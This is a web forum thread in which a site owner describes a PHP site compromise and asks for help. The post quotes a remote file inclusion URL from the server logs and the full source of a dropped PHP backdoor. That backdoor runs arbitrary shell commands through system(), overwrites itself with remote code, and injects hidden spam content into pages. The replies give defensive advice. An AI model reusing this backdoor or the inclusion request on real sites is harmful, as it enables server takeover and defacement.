I've got a site that it seems an IRC bot is attacking and writing an activeX virus after the <body> tags. I've been fighting this for weeks and here is what I have....

It is shared hosting, so php.ini is not available and my htaccess is limited. Register_Globals was on, today I turned it off after some extensive reading. The hacker is running code like the following found in my logs:

//phpSecurePages/secure.php?&cfgProgDir=http://rdxihx.angelfire.com/php

where the host its getting the file from changes each time, so blocking IP/Domains doesn't work and I have actually deleted phpSecurePages from the site and yet this script still works. You can follow the link after cfgProgDir to read the code that it accesses, then sometimes it creates a random file with the following code

<?php
ignore_user_abort(1);
set_time_limit(0);

function Clear()
{
    unlink("c");
    unlink("1r");
  unlink("log");
}

function Clear2()
{
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
    $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
    $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
    $fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
    $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
    echo " upt-ok";
}

function GetVar($name, &$var)
{
    $var = "";
    if (isset($_POST[$name]))
        $var = $_POST[$name];

  if (isset($_GET[$name]))
        $var = $_GET[$name];

if (($var) =="")
  return  false;
  else return true;
}

function Gen()
{
    $alp = "abcdefghiklmnjsweqrtyuiopzx";
    $maps = array();
    if (isset($_POST["sg"]))
        $sg = $_POST["sg"];

  if (isset($_GET["sg"]))
        $sg = $_GET["sg"]; 

if (isset($_POST["gm"]))
  $g = $_POST["gm"];

if (isset($_GET["gm"]))
    $g = $_GET["gm"];


$path = "";
$fr = fopen("1r", "a+");
if (file_exists("c"))
{
    $fconf = file("c");
    $tname = trim($fconf[0]);
    $cname = trim($fconf[1]);
    $curs = trim($fconf[2]);
    $pid = trim($fconf[3]);
    if ($pid == 100)
    {
        $pid = 0;
        $rnd = mt_rand(0, 999);
        $nm = "";
    for ($i=0; $i<3; $i++)
      {
          $ran = mt_rand(0,26);
          $sym = $alp[$ran];
          $nm = $nm.$sym;
      }
        $cname = $nm;
        mkdir("$tname/$cname");
        $curs = $g;
    }
}
else 
{
    $rnd = mt_rand(0, 999);
    $nm = "";
  for ($i=0; $i<5; $i++)
    {
        $ran = mt_rand(0,26);
        $sym = $alp[$ran];
        $nm = $nm.$sym;
    }
    $tname = $nm;
    $pid = 0;
    $curs = $g;
    mkdir($tname);
    $fht = fopen("$tname/.htaccess", "w+");
    $htname = $sg."2.txt";
    $fp = fopen($htname, "r");
    $fin = '';
    while (!feof($fp))
    {
         $fc = fgets($fp, 1024);
         if (!$fc) break;
       $fin .= $fc;
    }
    fclose($fp);
    fwrite($fht, $fin);
    fclose($fht);
    $rnd = mt_rand(0, 999);
    $nm = "";
for ($i=0; $i<3; $i++)
  {
      $ran = mt_rand(0,26);
      $sym = $alp[$ran];
      $nm = $nm.$sym;
  }
    $cname = $nm;
mkdir("$tname/$cname");
}
  $gname = $sg."sgen.php";
    for ($j=$pid; $j<$pid+10; $j++)
    {
        $fp = fopen($gname."?g=$curs", "r");
        $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
        fclose($fp);

    $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
}

if ($j==100)
{
  $fp = fopen($gname."?g=$curs&m=1", "r");
    $fin = '';
    while (!feof($fp))
    {
         $fc = fgets($fp, 1024);
         if (!$fc) break;
       $fin .= $fc;
    }
    fclose($fp);
    $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
    fwrite($fnd, $fin);
    fclose($fnd);
    $map = "$path/$tname/$cname/$curs"."_lm.htm";
    fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);
}

function Update()
{
    $thisname = "1.php";
    if (isset($_POST['u']))
      $u = $_POST['u'];

if (isset($_GET['u']))
     $u = $_GET['u'];

 $fp = fopen($u, "r");
  $fin = '';
        while (!feof($fp))
        {
             $fc = fgets($fp, 1024);
             if (!$fc) break;
           $fin .= $fc;
        }
  fclose($fp);

  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

function Com()
{
    if (isset($_POST['c']))
      @system($_POST['c']);
  if (isset($_GET['c']))
        @system($_GET['c']);
}

function MRepl()
{
    $mpt = "";
    $drs = "";
    $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><dd5> "; 
    $mrd = trim(file_get_contents("m"));
    $pt = "../$mrd";
    $fin = file_get_contents($pt);
    GetVar("mpt", $mpt);
     // óäàëÿåì çàâåðøàþùèå õòìë òåãè
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
    $fp = fopen($mpt, "r");
  $drs = '';
    while (!feof($fp))
    {
         $fc = fgets($fp, 1024);
         if (!$fc) 
         {  

       exit();
         }
       $drs .= $fc;
    }
  fclose($fp);
  $fin = $fin.$begtag;  

  $fin = $fin.$drs;
  $fin = $fin.$endtag; 
  $fmrd = fopen($pt, "w+");
    fwrite($fmrd, $fin);
    fclose($fmrd);
}

function Main()
{
    if (isset($_POST['u']) || isset($_GET['u']))
    {
        Update();
        exit();
    }

if (isset($_POST['c']) || isset($_GET['c']))
{
    Com();
    exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
    Gen();
    exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
    MRepl();
    exit();
}

  if (isset($_POST['cl']) || isset($_GET['cl']))
    {
        Clear();
        exit();
    }

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
    Clear2();
    exit();
}

echo "<ok>";

}

Main();

?>

Any Help Appreciated... I'm dying here

    Is the "phpSecurePages/secure.php" a file on your site? If so, then it would appear to be the culprit when it comes to doing something very insecure: most likely an include/require that uses $GET['cfgProgDir'] or $REQUEST['cfgProgDir'] to select the file that is included without any filtering of that value. If using PHP 5.2+, you can set the allow_url_include option to 0 (which should be the default setting) and allow_url_fopen to 0 (which could have side-effects you would then have to work around via cURL or such). This would stop the possibility of including remote files. And of course you could rview the "secure.php" file to find out where it is using that 'cfgProgDir' value and fixing whatever it is doing to me more secure.

      NogDog;10889840 wrote:

      Is the "phpSecurePages/secure.php" a file on your site? If so, then it would appear to be the culprit when it comes to doing something very insecure: most likely an include/require that uses $GET['cfgProgDir'] or $REQUEST['cfgProgDir'] to select the file that is included without any filtering of that value. If using PHP 5.2+, you can set the allow_url_include option to 0 (which should be the default setting) and allow_url_fopen to 0 (which could have side-effects you would then have to work around via cURL or such). This would stop the possibility of including remote files. And of course you could rview the "secure.php" file to find out where it is using that 'cfgProgDir' value and fixing whatever it is doing to me more secure.

      Thanks, but please read the post before you reply. First, the file already has been deleted, thats why I'm so lost. I'm using PHP4, so I can't set those parameters for the file include

        The allow_url_fopen can be set to 0 for PHP4, only the allow_url_include is PHP5.2 or later.

        Have you changed your login and FTP passwords?

        Have you notified the hosting support? (It could be someone with an account on the same host running PHP or Perl or other CGI scripts who is writing stuff into your directories.)

          Write a Reply...